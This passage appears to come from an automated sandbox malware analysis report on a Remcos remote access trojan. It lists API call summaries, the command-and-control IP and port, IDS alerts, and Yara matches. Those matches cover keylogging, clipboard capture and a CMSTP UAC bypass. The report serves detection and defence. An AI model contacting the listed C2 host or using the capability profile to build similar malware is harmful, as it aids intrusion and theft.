Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe; Code function: 17_2_0076B696 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,17_2_0076B696
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe; Code function: 17_2_0079D850 FindFirstFileExA,17_2_0079D850
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe; Code function: 17_2_00757CF3 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,17_2_00757CF3
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe; Code function: 17_2_00756D29 FindFirstFileW,FindNextFileW,17_2_00756D29
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe; Code function: 17_2_00768ED0 FindFirstFileW,17_2_00768ED0
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe; Code function: 20_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,20_2_0040B335
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe; Code function: 20_2_0041B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,20_2_0041B42F
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe; Code function: 20_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,20_2_0040B53A
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe; Code function: 20_2_0044D5E9 FindFirstFileExA,20_2_0044D5E9
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe; Code function: 20_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,20_2_004089A9
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe; Code function: 20_2_00406AC2 FindFirstFileW,FindNextFileW,20_2_00406AC2
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe; Code function: 20_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,20_2_00407A8C
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe; Code function: 20_2_00418C69 FindFirstFileW,FindNextFileW,FindNextFileW,20_2_00418C69
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe; Code function: 20_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,20_2_00408DA7
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe; Code function: 20_2_0213900E __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,20_2_0213900E
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe; Code function: 20_2_0214B696 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,20_2_0214B696
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe; Code function: 20_2_0213B59C FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,20_2_0213B59C
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe; Code function: 20_2_0217D850 FindFirstFileExA,20_2_0217D850
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe; Code function: 20_2_02148ED0 FindFirstFileW,20_2_02148ED0
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe; Code function: 20_2_02137CF3 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,20_2_02137CF3
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe; Code function: 20_2_02136D29 FindFirstFileW,FindNextFileW,20_2_02136D29
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 38_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,38_2_0040B335
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 38_2_0041B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,38_2_0041B42F
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 38_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,38_2_0040B53A
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 38_2_0044D5E9 FindFirstFileExA,38_2_0044D5E9
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 38_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,38_2_004089A9
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 38_2_00406AC2 FindFirstFileW,FindNextFileW,38_2_00406AC2
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 38_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,38_2_00407A8C
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 38_2_00418C69 FindFirstFileW,FindNextFileW,FindNextFileW,38_2_00418C69
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 38_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,38_2_00408DA7
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 38_2_0218900E __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,38_2_0218900E
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 38_2_0219B696 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,38_2_0219B696
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 38_2_0218B59C FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,38_2_0218B59C
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 38_2_021CD850 FindFirstFileExA,38_2_021CD850
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 38_2_02198ED0 FindFirstFileW,38_2_02198ED0
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 38_2_02187CF3 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,38_2_02187CF3
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 38_2_02186D29 FindFirstFileW,FindNextFileW,38_2_02186D29
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,0_2_00406F06

            Networking

Source: Network traffic Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49753 -> 198.23.227.212:32583
Source: Malware configuration extractor IPs: 198.23.227.212
Source: global traffic TCP traffic: 192.168.2.6:49753 -> 198.23.227.212:32583
Source: global traffic HTTP traffic detected: GET /json.gp HTTP/1.1 Host: geoplugin.net Cache-Control: no-cache
Source: Joe Sandbox View IP Address: 198.23.227.212 198.23.227.212
Source: Joe Sandbox View IP Address: 178.237.33.50 178.237.33.50
Source: Joe Sandbox View ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
Source: Network traffic Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.6:49828 -> 178.237.33.50:80
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.227.212
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe Code function: 0_2_004260F7 recv,0_2_004260F7
Source: global traffic DNS traffic detected: DNS query: geoplugin.net
Source: yavascript.exe String found in binary or memory: http://geoplugin.net/json.gp
Source: yavascript.exe, 00000011.00000003.2391005348.000000000088D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gp.
Source: yPIOW6yoPi.exe, 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, yPIOW6yoPi.exe, 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, yPIOW6yoPi.exe, 00000000.00000003.2151653856.00000000021D0000.00000004.00001000.00020000.00000000.sdmp, yavascript.exe, 00000011.00000003.2263067478.00000000021E0000.00000004.00001000.00020000.00000000.sdmp, yavascript.exe, 00000011.00000002.4624228504.0000000000750000.00000040.00001000.00020000.00000000.sdmp, yavascript.exe, 00000011.00000002.4623907696.0000000000400000.00000040.00000001.01000000.00000007.sdmp, yavascript.exe, 00000014.00000002.2309595604.0000000002130000.00000040.00001000.00020000.00000000.sdmp, yavascript.exe, 00000014.00000003.2272754089.0000000002200000.00000004.00001000.00020000.00000000.sdmp, yavascript.exe, 00000014.00000002.2309137529.0000000000400000.00000040.00000001.01000000.00000007.sdmp, yavascript.exe, 00000026.00000003.2355139636.0000000002200000.00000004.00001000.00020000.00000000.sdmp, yavascript.exe, 00000026.00000002.2378144683.0000000000400000.00000040.00000001.01000000.00000007.sdmp, yavascript.exe, 00000026.00000002.2378583588.0000000002180000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gp/C
Source: yavascript.exe, 00000011.00000003.2391005348.000000000088D000.00000004.00000020.00020000.00000000.sdmp, yavascript.exe, 00000011.00000002.4625247428.000000000088D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gp4
Source: yavascript.exe, 00000011.00000002.4625247428.000000000084E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gpSystem32
Source: yavascript.exe, 00000011.00000003.2391005348.000000000088D000.00000004.00000020.00020000.00000000.sdmp, yavascript.exe, 00000011.00000002.4625247428.000000000088D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gpk
Source: yavascript.exe, 00000011.00000003.2391005348.000000000088D000.00000004.00000020.00020000.00000000.sdmp, yavascript.exe, 00000011.00000002.4625247428.000000000088D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gpl
Source: Amcache.hve.4.dr String found in binary or memory: http://upx.sf.net

            Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: C:\Users\user\Desktop\yPIOW6yoPi.exe Code function: 0_2_004099E4 SetWindowsHookExA 0000000D,004099D0,00000000 0_2_004099E4
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe Code function: 0_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,0_2_004159C6
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe Code function: 17_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,17_2_004159C6
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe Code function: 20_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,20_2_004159C6
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe Code function: 38_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,38_2_004159C6
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe Code function: 0_2_00409B10 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,0_2_00409B10
Source: Yara match File source: 17.2.yavascript.exe.750e67.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.yPIOW6yoPi.exe.20f0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.yPIOW6yoPi.exe.20f0e67.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.yPIOW6yoPi.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.yavascript.exe.2130e67.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.yPIOW6yoPi.exe.21d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.yPIOW6yoPi.exe.21d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 38.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.yPIOW6yoPi.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.3.yavascript.exe.2200000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.3.yavascript.exe.21e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 38.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 38.2.yavascript.exe.2180e67.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 38.2.yavascript.exe.2180e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 38.3.yavascript.exe.2200000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 38.3.yavascript.exe.2200000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.yavascript.exe.750e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.yavascript.exe.2130e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.3.yavascript.exe.21e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.3.yavascript.exe.2200000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000003.2355139636.0000000002200000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2272754089.0000000002200000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.4624228504.0000000000750000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.2378144683.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2309595604.0000000002130000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.4623907696.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000003.2263067478.00000000021E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2151653856.00000000021D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.2378583588.0000000002180000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2309137529.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: yPIOW6yoPi.exe PID: 1612, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: yavascript.exe PID: 1512, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: yavascript.exe PID: 4196, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: yavascript.exe PID: 1352, type: MEMORYSTR

            E-Banking Fraud

Source: Yara match File source: 17.2.yavascript.exe.750e67.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.yPIOW6yoPi.exe.20f0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.yPIOW6yoPi.exe.20f0e67.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.yPIOW6yoPi.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.yavascript.exe.2130e67.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.yPIOW6yoPi.exe.21d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.yPIOW6yoPi.exe.21d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 38.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.yPIOW6yoPi.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.3.yavascript.exe.2200000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.3.yavascript.exe.21e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 38.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 38.2.yavascript.exe.2180e67.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 38.2.yavascript.exe.2180e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 38.3.yavascript.exe.2200000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 38.3.yavascript.exe.2200000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.yavascript.exe.750e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.yavascript.exe.2130e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.3.yavascript.exe.21e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.3.yavascript.exe.2200000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000011.00000002.4625247428.000000000084E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2295191627.00000000005A4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.2378390823.0000000000748000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2309481158.0000000000698000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000003.2355139636.0000000002200000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2272754089.0000000002200000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.4624228504.0000000000750000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.2378144683.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2309595604.0000000002130000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.4623907696.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000003.2263067478.00000000021E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2151653856.00000000021D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.2378583588.0000000002180000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2309137529.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: yPIOW6yoPi.exe PID: 1612, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: yavascript.exe PID: 1512, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: yavascript.exe PID: 4196, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: yavascript.exe PID: 1352, type: MEMORYSTR

            Spam, unwanted Advertisements and Ransom Demands

Source: C:\Users\user\Desktop\yPIOW6yoPi.exe Code function: 0_2_0041BB77 SystemParametersInfoW,0_2_0041BB77
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe Code function: 0_2_0210BDDE SystemParametersInfoW,0_2_0210BDDE
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe Code function: 17_2_0041BB77 SystemParametersInfoW,17_2_0041BB77
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe Code function: 17_2_0076BDDE SystemParametersInfoW,17_2_0076BDDE
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe Code function: 20_2_0041BB77 SystemParametersInfoW,20_2_0041BB77
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe Code function: 20_2_0214BDDE SystemParametersInfoW,20_2_0214BDDE
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe Code function: 38_2_0041BB77 SystemParametersInfoW,38_2_0041BB77
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe Code function: 38_2_0219BDDE SystemParametersInfoW,38_2_0219BDDE

            System Summary

Source: 17.2.yavascript.exe.750e67.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 17.2.yavascript.exe.750e67.1.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 17.2.yavascript.exe.750e67.1.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0.2.yPIOW6yoPi.exe.20f0e67.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0.2.yPIOW6yoPi.exe.20f0e67.1.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0.2.yPIOW6yoPi.exe.20f0e67.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 20.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 20.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 20.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0.2.yPIOW6yoPi.exe.20f0e67.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0.2.yPIOW6yoPi.exe.20f0e67.1.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0.2.yPIOW6yoPi.exe.20f0e67.1.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 20.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 20.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 20.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 17.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 17.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 17.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 17.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 17.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 17.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0.2.yPIOW6yoPi.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0.2.yPIOW6yoPi.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0.2.yPIOW6yoPi.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 20.2.yavascript.exe.2130e67.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 20.2.yavascript.exe.2130e67.1.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 20.2.yavascript.exe.2130e67.1.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0.3.yPIOW6yoPi.exe.21d0000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0.3.yPIOW6yoPi.exe.21d0000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0.3.yPIOW6yoPi.exe.21d0000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0.3.yPIOW6yoPi.exe.21d0000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0.3.yPIOW6yoPi.exe.21d0000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0.3.yPIOW6yoPi.exe.21d0000.0.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 38.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 38.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 38.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0.2.yPIOW6yoPi.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0.2.yPIOW6yoPi.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0.2.yPIOW6yoPi.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 20.3.yavascript.exe.2200000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 20.3.yavascript.exe.2200000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 20.3.yavascript.exe.2200000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 17.3.yavascript.exe.21e0000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 17.3.yavascript.exe.21e0000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 17.3.yavascript.exe.21e0000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 38.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 38.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 38.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 38.2.yavascript.exe.2180e67.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
